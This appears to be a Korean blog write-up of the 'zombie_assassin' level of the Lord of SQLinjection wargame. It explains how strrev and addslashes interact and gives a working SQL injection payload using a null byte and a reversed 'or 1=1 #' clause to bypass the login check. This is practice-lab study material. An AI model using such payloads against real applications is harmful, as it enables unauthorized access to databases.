본문 바로가기
모의해킹/Lord of SQLinjection

zombie_assassin

철민1234 2023. 6. 8. 20:58
728x90

문제 정보

문제 접근 

1. strrev 함수로 인해 뒤집어서 출력이 됨

2. addslashes 함수로 인해 id='' 두 번째 따옴표를 문자열로 \ 가 출력이 됨

 

select id from prob_zombie_assassin where id=%00&&pw=%23%201=1% 20ro%20 

strrev 함수가 없을때의 페이로드는 id=%00&&pw= or 1=1 %23이다.

id값에 %00(널 값)을 넣으면 addslashes 때문에 \ 가 자동으로 생기면서 'and pw='가 한 문자열이 된다.

 

'모의해킹 > Lord of SQLinjection' 카테고리의 다른 글

nightmare  (0) 2023.06.12
succubus  (0) 2023.06.08
assassin  (0) 2023.06.06
giant  (0) 2023.06.05
bugbear  (0) 2023.06.05

'모의해킹/Lord of SQLinjection' Related Articles

티스토리툴바